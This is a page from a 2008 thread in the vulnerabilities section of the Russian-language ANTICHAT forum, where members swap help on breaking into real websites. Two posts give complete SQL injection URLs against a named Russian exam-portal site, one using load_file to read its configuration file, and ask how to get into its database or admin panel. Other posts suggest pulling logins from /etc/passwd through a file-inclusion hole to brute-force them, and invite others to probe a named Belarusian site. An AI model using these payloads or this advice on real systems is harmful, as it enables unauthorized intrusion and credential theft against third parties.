HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 232 из 2422 « Первая < 132182222 228 229 230 231 232 233 234 235 236 2422823327321232 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.06.2008, 19:50
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию
Так же есть etc/passwd и httpd.cond.Сколько ни пыталсо,вручную все не перебрал(руки отвалились:ДД,ибо инклудера нету работающего).Что можно выудить из всей этой информации ? Логина и пароля тут нету =_=.phpinfo кстати тож имеецо,но от него толку мало).Что должно быть в httpd.conf ? В системе такой фаил один?.

ЗЫ: прошу прощения за флуд,но в один пост всё не накатаешь...
 
Ответить с цитированием

  #2  
Старый 13.06.2008, 20:27
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
Велемир, из etc/passwd можешь вытащить логины и брутить их Из конфигов апача можно получить полный путь и попытаца найти конфиг и проинклюдить его.
 
Ответить с цитированием

  #3  
Старый 13.06.2008, 21:00
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию
Цитата:
Сообщение от n0ne  
Велемир, из etc/passwd можешь вытащить логины и брутить их Из конфигов апача можно получить полный путь и попытаца найти конфиг и проинклюдить его.
А вот я не знаю где он там... =__________=
 
Ответить с цитированием

  #4  
Старый 13.06.2008, 23:29
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
Велемир, не знаешь где конфиг или где этот путь в конфиге?
 
Ответить с цитированием

  #5  
Старый 14.06.2008, 01:30
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию
Где путьв конфиге конкретно.Там идёт сплошной текст хрен разобрать =_=
 
Ответить с цитированием

  #6  
Старый 14.06.2008, 02:15
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


По умолчанию
нужно название табличек и столбцов в FastBB кто поможет
 
Ответить с цитированием

  #7  
Старый 14.06.2008, 08:30
sakh_rider
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296

Репутация: 2
По умолчанию
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,3,load_file(configuration.php), 5,6+from+jos_users.users--

Denied блин
Может кто уже был на етом сайте и знает как в БД попасть или хотя бы в админку?
 
Ответить с цитированием

  #8  
Старый 14.06.2008, 11:10
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
По умолчанию
Свой вопрос снимаю=) сам же расписывал тут функцию substring и сам же не додумался ее использовать=)
 
Ответить с цитированием

  #9  
Старый 14.06.2008, 11:33
Neorin
Познающий
Регистрация: 30.04.2007
Сообщений: 67
Провел на форуме:
287714

Репутация: 40
По умолчанию
посотрите ентот сайтик пжалуйста, то чет я не чего стоищего найтии немогу! http://rikz.unibel.by/
 
Ответить с цитированием

  #10  
Старый 14.06.2008, 12:18
sakh_rider
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296

Репутация: 2
По умолчанию
Есть срочный вопрос:
Составляю запрос:
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+order+by+10--
Вылазит такое:
Unknown column '10' in 'order clause'
Ето то понятно, но что странное:
Составляю запрос:
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+order+by+3--
Страница вообще изчезает, да и в коде ничего нет.
Иду дальше:
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-+union+select 1,2,3--
и тут мистика: страница вообще не грузится.
Ладно, я подумал, что так и должно быть, попробовал такое:
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,version()--
она опять не захотела грузица да и '+' изчезают и заменяются на пробелы(...
Что странное - то, что при других циферках вылазиют ошибки типа нет такой таблицы или числа. А именно при "3" страница не грузица вообще...
Если кто знает подскажите плиз...
 
Ответить с цитированием
Ответ
Страница 232 из 2422 « Первая < 132182222 228 229 230 231 232 233 234 235 236 2422823327321232 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.